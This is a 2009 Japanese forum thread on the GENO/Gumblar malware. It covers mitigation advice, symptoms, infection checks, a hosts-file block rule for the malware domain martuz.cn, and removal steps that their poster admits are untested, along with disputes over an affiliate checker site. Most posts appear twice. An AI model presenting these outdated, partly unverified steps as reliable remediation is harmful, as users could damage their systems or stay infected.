GENOウイルススレ 感染4台目
1 :192.168.0.774:
★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
(9.1.0)
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
(9.1.1↑,をインストールしてから↓を適用)
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
■ FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。)
swfのロード、pdfの関連づけ、activeXの無効化がきちんと出来れば問題ないが、IEコンポーネント利用ブラウザでは難しい
そのアタリが比較的楽に設定できるOperaはお勧め
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
■ Vistaの人ははUACをONにする
★GENOウイルスチェッカー、GENOウイルスまとめ
http://geno.2ch.tc/
★前スレ
GENOウイルススレ 感染3台目
http://pc11.2ch.net/test/read.cgi/internet/1242721365/
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
(9.1.0)
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
(9.1.1↑,をインストールしてから↓を適用)
http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
■ FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。)
swfのロード、pdfの関連づけ、activeXの無効化がきちんと出来れば問題ないが、IEコンポーネント利用ブラウザでは難しい
そのアタリが比較的楽に設定できるOperaはお勧め
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
■ Vistaの人ははUACをONにする
★GENOウイルスチェッカー、GENOウイルスまとめ
http://geno.2ch.tc/
★前スレ
GENOウイルススレ 感染3台目
http://pc11.2ch.net/test/read.cgi/internet/1242721365/
|
|
|
2 :192.168.0.774:2009/05/23(土) 12:44:46 ID:Hx9+/5Qd0
★症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★感染確認方法
(現状(05/17)では感染が発覚したからといってどうにもできない、安心したい人用)
@regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとレジストリエディタが立ち上がらない。
■ 確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
Aavast!(無料のアンチウイルスソフト)で確認
Bsqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
★感染した場合
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
6.正常なsqlsodbc.chmに差し替え
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★感染確認方法
(現状(05/17)では感染が発覚したからといってどうにもできない、安心したい人用)
@regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとレジストリエディタが立ち上がらない。
■ 確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
Aavast!(無料のアンチウイルスソフト)で確認
Bsqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
★感染した場合
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
6.正常なsqlsodbc.chmに差し替え
3 :192.168.0.774:2009/05/23(土) 13:15:54 ID:Sr+xO+q90
イチモツ
4 :192.168.0.774:2009/05/23(土) 13:20:22 ID:ta6edS2L0
まーたアフィの人がテンプレ変えたな
GENOウイルスチェッカー(アフィリエイトも充実)
ttp://geno.2ch.tc/← アフィリエイト(Amazon) ↓ソース
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに ttp://geno.2ch.tc/index.php?url=$TEXT$LINK
でjaneから検索でチェックできる
GENOウイルスチェッカー(アフィリエイトも充実)
ttp://geno.2ch.tc/← アフィリエイト(Amazon) ↓ソース
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="http://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに ttp://geno.2ch.tc/index.php?url=$TEXT$LINK
でjaneから検索でチェックできる
5 :192.168.0.774:2009/05/23(土) 13:21:17 ID:ta6edS2L0
>>1
対応済
Flash Player 9.0.159.0 10.0.22.87
Adobe Reader 7.1.1 8.1.4 9.1.0
最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
対応済
Flash Player 9.0.159.0 10.0.22.87
Adobe Reader 7.1.1 8.1.4 9.1.0
最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
6 :192.168.0.774:2009/05/23(土) 13:30:55 ID:Hx9+/5Qd0
お、俺がチェッカーの管理人だって!?
俺はチェッカーに救われた一般人ですよ
俺はチェッカーに救われた一般人ですよ
7 :192.168.0.774:2009/05/23(土) 13:32:50 ID:ta6edS2L0
いやいやだからって何でテンプレ変えちゃうわけ?
そのテンプレ間違えだらけだし、チェッカーも初心者の不安煽るだけじゃん
チェッカー使った初心者が黒ですか白ですかって結局確認しにくるだろうが。
そのテンプレ間違えだらけだし、チェッカーも初心者の不安煽るだけじゃん
チェッカー使った初心者が黒ですか白ですかって結局確認しにくるだろうが。
8 :192.168.0.774:2009/05/23(土) 13:35:44 ID:mqjRjq9C0
間違 え だらけ…
9 :192.168.0.774:2009/05/23(土) 13:36:28 ID:oHG73gbi0
10 :192.168.0.774:2009/05/23(土) 13:38:56 ID:F81SI+Tt0
結局あのゴミチェッカーは混乱しか生まなかったしな
11 :192.168.0.774:2009/05/23(土) 13:41:19 ID:ta6edS2L0
12 :192.168.0.774:2009/05/23(土) 13:42:21 ID:Hx9+/5Qd0
13 :192.168.0.774:2009/05/23(土) 13:44:28 ID:ta6edS2L0
>>12
ここはGENOスレな
ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html
感染報告やら参照するのにどこでこの脆弱性が修正されたかは明確なほうがいいだろ
ここはGENOスレな
ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html
感染報告やら参照するのにどこでこの脆弱性が修正されたかは明確なほうがいいだろ
14 :192.168.0.774:2009/05/23(土) 13:47:52 ID:Sr+xO+q90
>>13
GENOウイルススレであろうがなんであろうが、初心者に優しい方がいいに決まってるだろうが
どこで脆弱性が修正されたかなんて一部の知識ある人が勝手に調べればいいだけだっつーの
だいたいそういう知識あるヤツは感染もしないし、アップデートもちゃんとしてる
GENOウイルススレであろうがなんであろうが、初心者に優しい方がいいに決まってるだろうが
どこで脆弱性が修正されたかなんて一部の知識ある人が勝手に調べればいいだけだっつーの
だいたいそういう知識あるヤツは感染もしないし、アップデートもちゃんとしてる
15 :192.168.0.774:2009/05/23(土) 13:51:13 ID:F81SI+Tt0
>>14
初心者に優しいスレを目指すなら間違えぐらい直すべき
初心者に優しいスレを目指すなら間違えぐらい直すべき
16 :192.168.0.774:2009/05/23(土) 13:53:42 ID:soK/x83h0
/⌒ヽ
/ ´_ゝ`) お久しぶりですね、すいません、ちょっと ry
| /
| /| |
// | |
U .U
/ ´_ゝ`) お久しぶりですね、すいません、ちょっと ry
| /
| /| |
// | |
U .U
17 :192.168.0.774:2009/05/23(土) 13:53:57 ID:Hx9+/5Qd0
なんだよ
ID:F81SI+Tt0=ID:ta6edS2L0
かよww
必死ダナーwww
ID:F81SI+Tt0=ID:ta6edS2L0
かよww
必死ダナーwww
18 :192.168.0.774:2009/05/23(土) 13:54:17 ID:ta6edS2L0
初心者にやさしい対策テンプレが
・hosts追記
・js無効(火狐NoScript推奨)
ねーよ。それならreader更新だけでいいじゃん。
・hosts追記
・js無効(火狐NoScript推奨)
ねーよ。それならreader更新だけでいいじゃん。
19 :192.168.0.774:2009/05/23(土) 13:54:21 ID:3BjN7uEa0
間違えの無いようにやっていきたいもんです
20 :192.168.0.774:2009/05/23(土) 13:56:00 ID:F81SI+Tt0
前スレのテンプレ書き直すか
21 :192.168.0.774:2009/05/23(土) 13:56:01 ID:ta6edS2L0
22 :192.168.0.774:2009/05/23(土) 13:59:41 ID:YL7Xpp0S0
なになに、昨日だかadobe reader6.0→9.1.0にして
安心してたけど9.1.1じゃないとダメなのかw
(9.1.0をインストールしてから↓を適用)
ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
これはreader起動して「アップデートの有無をチェック」ではダメなのん?
安心してたけど9.1.1じゃないとダメなのかw
(9.1.0をインストールしてから↓を適用)
ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
これはreader起動して「アップデートの有無をチェック」ではダメなのん?
23 :192.168.0.774:2009/05/23(土) 14:00:21 ID:ZVz/t1CW0
新スレいきなり荒れててワロタw
firefoxのNoScript、試したことない人は一度はやってみるのもいい鴨
ただ、だんだん我慢できなくなって外してしまう、遅かれ早かれw
前スレ>>854にチラっと出てたeval関数だけ止めるとかいうやつは
国産オミトロンみたいなもんという理解でいいと思われ
にしても初心者対応は難しいよね。要するに「明日も明後日も絶対安心な方法を教えて!」
って言ってるようなものだからなぁ。そんな方法があれば誰も苦労しませんよ、ないから
こうやって必死に毎日、最新の情報漁ってるというのに・・・
firefoxのNoScript、試したことない人は一度はやってみるのもいい鴨
ただ、だんだん我慢できなくなって外してしまう、遅かれ早かれw
前スレ>>854にチラっと出てたeval関数だけ止めるとかいうやつは
国産オミトロンみたいなもんという理解でいいと思われ
にしても初心者対応は難しいよね。要するに「明日も明後日も絶対安心な方法を教えて!」
って言ってるようなものだからなぁ。そんな方法があれば誰も苦労しませんよ、ないから
こうやって必死に毎日、最新の情報漁ってるというのに・・・
24 :192.168.0.774:2009/05/23(土) 14:00:50 ID:BPqsEeLX0
sqlsodbc.chmのサイズが1.29 KB (1,323 バイト)だったんだけど…
感染してたのかな。取りあえず削除して入れなおしました。
GENOウイルスチェッカーって信憑性あるの?
どこで感染したか調べたくて、その頃行ったサイト ttp://boox.jp/
をチェックしたら危険度106%って出たんだけど。
感染してたのかな。取りあえず削除して入れなおしました。
GENOウイルスチェッカーって信憑性あるの?
どこで感染したか調べたくて、その頃行ったサイト ttp://boox.jp/
をチェックしたら危険度106%って出たんだけど。
25 :192.168.0.774:2009/05/23(土) 14:01:34 ID:OPuerAms0
26 :192.168.0.774:2009/05/23(土) 14:02:54 ID:ta6edS2L0
27 :192.168.0.774:2009/05/23(土) 14:04:14 ID:ta6edS2L0
>>25
意味がわかりません。
意味がわかりません。
28 :192.168.0.774:2009/05/23(土) 14:05:29 ID:MMIDDv3r0
>>27
厨獄に帰れウジ虫
厨獄に帰れウジ虫
29 :192.168.0.774:2009/05/23(土) 14:05:36 ID:Sr+xO+q90
>>21
お前はなにを言っているんだ(AAry
>>18
hosts追記は現時点では無効だけど
noscriptに関しては、新たな脆弱性に対して有効だよね?
>>24
chmがどうたらこうたらはワカランけど
そこは大丈夫だよ
お前はなにを言っているんだ(AAry
>>18
hosts追記は現時点では無効だけど
noscriptに関しては、新たな脆弱性に対して有効だよね?
>>24
chmがどうたらこうたらはワカランけど
そこは大丈夫だよ
30 :192.168.0.774:2009/05/23(土) 14:06:46 ID:C376xCRT0
31 :192.168.0.774:2009/05/23(土) 14:07:21 ID:ZVz/t1CW0
>>1
> http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
> (9.1.1↑,をインストールしてから↓を適用)
今は最初から9.1.1でインストールされる筈 まぁ画面見てればわかるが
> http://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
> (9.1.1↑,をインストールしてから↓を適用)
今は最初から9.1.1でインストールされる筈 まぁ画面見てればわかるが
32 :192.168.0.774:2009/05/23(土) 14:08:57 ID:Hx9+/5Qd0
33 :192.168.0.774:2009/05/23(土) 14:09:45 ID:BPqsEeLX0
34 :192.168.0.774:2009/05/23(土) 14:10:18 ID:DahySqY8O
このスレもとうとう消費期限が切れたか…
35 :192.168.0.774:2009/05/23(土) 14:10:37 ID:jkLej88t0
ID:oHG73gbi0
ID:OPuerAms0
ID:MMIDDv3r0
単発
ID:OPuerAms0
ID:MMIDDv3r0
単発
36 :192.168.0.774:2009/05/23(土) 14:12:01 ID:OPuerAms0
37 :192.168.0.774:2009/05/23(土) 14:12:10 ID:jkLej88t0
ID:Hx9+/5Qd0
38 :192.168.0.774:2009/05/23(土) 14:13:47 ID:YL7Xpp0S0
39 :192.168.0.774:2009/05/23(土) 14:19:03 ID:BPqsEeLX0
40 :192.168.0.774:2009/05/23(土) 14:19:17 ID:jkLej88t0
ttp://www3.atword.jp/gnome/2009/05/19/finally-several-security-venders-detect-gumblaroid-completely/
全撃墜してるのは
AhnLab-V3
AntiVir
AVG
Kaspersky
McAfee-GW-Edition
Microsoft
NOD
Rising
Symantec
avast!でもいいの?
全撃墜してるのは
AhnLab-V3
AntiVir
AVG
Kaspersky
McAfee-GW-Edition
Microsoft
NOD
Rising
Symantec
avast!でもいいの?
41 :192.168.0.774:2009/05/23(土) 14:22:32 ID:0Xu3vLQ/0
>>40
今日の日付確認しろw
今日の日付確認しろw
42 :192.168.0.774:2009/05/23(土) 14:35:44 ID:F81SI+Tt0
うわーテンプレ書き直そうと思ったけど前のテンプレも結構微妙だー
sqlsodbc.chmのサイズに頼るんじゃなくてレジストリの内容見た方が確実
だと思うんだけどやっぱ初心者向けじゃないか
sqlsodbc.chmのサイズに頼るんじゃなくてレジストリの内容見た方が確実
だと思うんだけどやっぱ初心者向けじゃないか
43 :192.168.0.774:2009/05/23(土) 14:36:34 ID:C376xCRT0
>>39
こっちも見てみて
駆除方法についてSymantecの説明
http://www.symantec.com/ja/jp/norton/security_response/writeup.jsp?docid=2009-051900-3410-99&tabid=3
ただ、今後のためにもリカバリディスクはあったほうがいいよ
メーカー製PCならHDD内にあるんじゃないのかな
取説みてくれ
こっちも見てみて
駆除方法についてSymantecの説明
http://www.symantec.com/ja/jp/norton/security_response/writeup.jsp?docid=2009-051900-3410-99&tabid=3
ただ、今後のためにもリカバリディスクはあったほうがいいよ
メーカー製PCならHDD内にあるんじゃないのかな
取説みてくれ
44 :192.168.0.774:2009/05/23(土) 15:00:55 ID:BukbC16CP
対応してるアンチウィルスソフト一覧を貼って下さい
45 :192.168.0.774:2009/05/23(土) 15:03:38 ID:XxYYorp40
46 :192.168.0.774:2009/05/23(土) 15:04:20 ID:BPqsEeLX0
47 :192.168.0.774:2009/05/23(土) 15:15:04 ID:MMIDDv3r0
(・∀・)ニヤニヤ
48 :192.168.0.774:2009/05/23(土) 15:15:46 ID:imZ1efiC0
>>44
1種類じゃなく、何種類も日替わりで出まわっているので、そんな一覧作成できない。
検出可否報告スレを見る限りでは、かなりのベンダーが対応を始めているようだが
完璧に対応していて除去までおっけーなところを聞かれてもわからない。
本体検出の能力と、除去能力は別のものだから。
1種類じゃなく、何種類も日替わりで出まわっているので、そんな一覧作成できない。
検出可否報告スレを見る限りでは、かなりのベンダーが対応を始めているようだが
完璧に対応していて除去までおっけーなところを聞かれてもわからない。
本体検出の能力と、除去能力は別のものだから。
49 :192.168.0.774:2009/05/23(土) 15:22:23 ID:F81SI+Tt0
出回ってたの4日も前の話ですよ
50 :192.168.0.774:2009/05/23(土) 15:22:55 ID:1RJPI6/M0
前スレの984で
-------------
984 名前:192.168.0.774[sage] 投稿日:2009/05/23(土) 09:31:48 ID:Ci5k0h8A0 (PC)
あと、6時間前に立った セキュリティー板のテンプレに
■ポート135を閉じる
■ポート445を閉じる
ってあるんだが、止めさせて方がいいと思うんだが、どうだろう?
-------------------
と書いたんだけど、コメントくれた人。
なかなかレスできなくてごめん。ありがとう。
さっきまで感染疑いの奴と電話で話してたんだが、
確認ステップの途中で「まだあるの〜はぁー」なんてため息つかれちまった。 なんだこの怒り。
/////////
ポート135と445を止める為にサービスを停止するTipsはあっちのスレのテンプレから外した方が良さそうって
のがこっちのスレの意見ってことでOKかな?
だが、検索すると脆弱性情報とか危険なポートなので塞いだ方がいいっていうスタンスのサイトばかりで、
サービスの停止にする事によってポートを塞ぐことによる弊害を説明するのが大変そうだな。
「さっきのスレの最後の方を読んでくれ」だと、こっちに人が増えてマズイか?
>>43
これでも危険度低に分類されるんだね。 じゃあ高ってどんなのだよと思ったが、
ゼロデイじゃないし感染する為の必要条件も複数あるし、攻撃サイトは消えたしなぁ。
-------------
984 名前:192.168.0.774[sage] 投稿日:2009/05/23(土) 09:31:48 ID:Ci5k0h8A0 (PC)
あと、6時間前に立った セキュリティー板のテンプレに
■ポート135を閉じる
■ポート445を閉じる
ってあるんだが、止めさせて方がいいと思うんだが、どうだろう?
-------------------
と書いたんだけど、コメントくれた人。
なかなかレスできなくてごめん。ありがとう。
さっきまで感染疑いの奴と電話で話してたんだが、
確認ステップの途中で「まだあるの〜はぁー」なんてため息つかれちまった。 なんだこの怒り。
/////////
ポート135と445を止める為にサービスを停止するTipsはあっちのスレのテンプレから外した方が良さそうって
のがこっちのスレの意見ってことでOKかな?
だが、検索すると脆弱性情報とか危険なポートなので塞いだ方がいいっていうスタンスのサイトばかりで、
サービスの停止にする事によってポートを塞ぐことによる弊害を説明するのが大変そうだな。
「さっきのスレの最後の方を読んでくれ」だと、こっちに人が増えてマズイか?
>>43
これでも危険度低に分類されるんだね。 じゃあ高ってどんなのだよと思ったが、
ゼロデイじゃないし感染する為の必要条件も複数あるし、攻撃サイトは消えたしなぁ。
51 :192.168.0.774:2009/05/23(土) 15:31:08 ID:0Xu3vLQ/0
>>50
ちうかRPC停止云々をテンプレから外したほうが〜って話はテンプレに組み込まれた時から言われてたのよw
でもその時は流れ速くてスレ立て人が気付いて無かったり、荒らしがスレ立ててわざと旧テンプレ書いたり
んな流れで残ってるだけ
Port135も445も塞いだほうが良いのは確かだが、GENOにゃ関係無いしテンプレに含まなくても良い(現状ならね)
そしてRPC停止は影響度が高い(依存関係が大量で初心者ほどやっちゃいかん行為)ので正直書いた奴出て来いって感じw
ちうかRPC停止云々をテンプレから外したほうが〜って話はテンプレに組み込まれた時から言われてたのよw
でもその時は流れ速くてスレ立て人が気付いて無かったり、荒らしがスレ立ててわざと旧テンプレ書いたり
んな流れで残ってるだけ
Port135も445も塞いだほうが良いのは確かだが、GENOにゃ関係無いしテンプレに含まなくても良い(現状ならね)
そしてRPC停止は影響度が高い(依存関係が大量で初心者ほどやっちゃいかん行為)ので正直書いた奴出て来いって感じw
52 :192.168.0.774:2009/05/23(土) 15:35:41 ID:h8voSB2Y0
rpcssは止めるに止められない【サービス】。
135,445は、外からは入らないようにする【ポート】。
GENO系ウイルスは関連してないが、こっから入られるウイルスは多いので、
巻き添えで話題になってる。関係ないけど、これを機会になんとかしとけ。
135,445は、外からは入らないようにする【ポート】。
GENO系ウイルスは関連してないが、こっから入られるウイルスは多いので、
巻き添えで話題になってる。関係ないけど、これを機会になんとかしとけ。
53 :192.168.0.774:2009/05/23(土) 15:37:58 ID:BZCm21Hn0
前スレの結論としてはアドビリーダーを7〜9で更新していれば良かったんじゃないかな
他にアンチウイルスソフトを変えたり、ブラウザのジャバを切ったりするのは確か意味無かったと思う
他にアンチウイルスソフトを変えたり、ブラウザのジャバを切ったりするのは確か意味無かったと思う
54 :192.168.0.774:2009/05/23(土) 15:43:42 ID:BZCm21Hn0
↑アドビリーダーの脆弱性を突いたウイルスだから
それが機能しなかったら他の事をやってみ意味が無いという意味ね
それが機能しなかったら他の事をやってみ意味が無いという意味ね
55 :192.168.0.774:2009/05/23(土) 16:02:04 ID:h8voSB2Y0
Javaを切る: 特に数年前は、他のウイルスをよけるのに意味があったが、今回ウイルスには無効。
JavaScriptを切る: 効果があるが、見られないサイトがかなり出てくる悪感で、対初心者には非現実案。
JavaScriptを切る: 効果があるが、見られないサイトがかなり出てくる悪感で、対初心者には非現実案。
56 :192.168.0.774:2009/05/23(土) 16:16:30 ID:BZCm21Hn0
まあいいや、おまいらはご丁寧にウィンドウズの更新も出来なくするような間抜けだから
過剰防壁でも備えたまへ
過剰防壁でも備えたまへ
57 :192.168.0.774:2009/05/23(土) 16:18:45 ID:1RJPI6/M0
58 :192.168.0.774:2009/05/23(土) 16:29:33 ID:4+szvDMsP
59 :192.168.0.774:2009/05/23(土) 16:29:35 ID:FQnBqUEn0
チラ裏メモ
■ Adobe Flash Player
Adobe Flash Player のバージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
ブラウザ上でアクティブになっている Flash Player と、
最新のバージョンを確認できる。
この書き込み時の最新バージョン : 10,0,22,87
■ Adobe Reader
Adobe Reader のバージョン確認方法
Adobe Reader の[ヘルプ]メニュー→[Adobe Reader X について]
この書き込み時の最新バージョン : 9,1,1
■ Adobe Flash Player
Adobe Flash Player のバージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
ブラウザ上でアクティブになっている Flash Player と、
最新のバージョンを確認できる。
この書き込み時の最新バージョン : 10,0,22,87
■ Adobe Reader
Adobe Reader のバージョン確認方法
Adobe Reader の[ヘルプ]メニュー→[Adobe Reader X について]
この書き込み時の最新バージョン : 9,1,1
60 :192.168.0.774:2009/05/23(土) 17:27:28 ID:M+Ygu9WD0
Adobe Readerなんて入れなきゃいいだけでしょ
61 :192.168.0.774:2009/05/23(土) 17:29:00 ID:jkLej88t0
セキュ板19もアフィのチェッカーのテンプレに書き換えられてるのね
62 :192.168.0.774:2009/05/23(土) 17:40:34 ID:O9Ovf6/e0
>>60
けだし正解である。
けだし正解である。
63 :192.168.0.774:2009/05/23(土) 17:44:20 ID:a8bSNZSK0
>>60
フラッシュもね。
フラッシュもね。
64 :192.168.0.774:2009/05/23(土) 17:46:07 ID:FMuei+100
>>50
それらのポートは外部に対して閉じておけばいい話で、LAN内で
閉じる必要はない。
ブロードバンド回線を使っているのならルータがあるだろうから、
ルータで閉じておけばいいし、モバイルの場合はFWアプリで
ブロックすればいい。
いずれにしろ、サービスレベルで止めてしまうのは無茶だし、
そもそもGENOに直接関係しているものでもない。
セキュリティ一般の基本みたいなもんだから、テンプレには
必要ないでしょ。
それらのポートは外部に対して閉じておけばいい話で、LAN内で
閉じる必要はない。
ブロードバンド回線を使っているのならルータがあるだろうから、
ルータで閉じておけばいいし、モバイルの場合はFWアプリで
ブロックすればいい。
いずれにしろ、サービスレベルで止めてしまうのは無茶だし、
そもそもGENOに直接関係しているものでもない。
セキュリティ一般の基本みたいなもんだから、テンプレには
必要ないでしょ。
65 :192.168.0.774:2009/05/23(土) 17:59:00 ID:1RJPI6/M0
>>64
もう書いちまったあとだけど、後押しthx。
>>59
そこ、下の黒文字(現在の Flash Player バージョン)よりも、
テスト結果の赤文字の方が新しいってことあるよ。
つまり、現在の最新バージョンの更新タイミングがめちゃくちゃ遅い(1ヶ月放っておかれるなんてざら)。
はじめは偽サイトかと思って焦ったほどだ。
JRE とかのJavaもだけど、英語サイトで確認するか、その補足程度に使うのがお奨め。
Security bulletins and advisories
http://www.adobe.com/support/security/#flashplayer
もう書いちまったあとだけど、後押しthx。
>>59
そこ、下の黒文字(現在の Flash Player バージョン)よりも、
テスト結果の赤文字の方が新しいってことあるよ。
つまり、現在の最新バージョンの更新タイミングがめちゃくちゃ遅い(1ヶ月放っておかれるなんてざら)。
はじめは偽サイトかと思って焦ったほどだ。
JRE とかのJavaもだけど、英語サイトで確認するか、その補足程度に使うのがお奨め。
Security bulletins and advisories
http://www.adobe.com/support/security/#flashplayer
66 :192.168.0.774:2009/05/23(土) 18:30:14 ID:imZ1efiC0
>>61
うむ、アフィチェッカーは、テンプレから外すべきだろう。混乱を招いている上に、テンプレ改変とか、いらんことしかしない。
うむ、アフィチェッカーは、テンプレから外すべきだろう。混乱を招いている上に、テンプレ改変とか、いらんことしかしない。
67 :192.168.0.774:2009/05/23(土) 18:33:24 ID:Sz6n7xWm0
やべえサブ機感染したかも
文字勝手に打ちまくって制御不能
文字勝手に打ちまくって制御不能
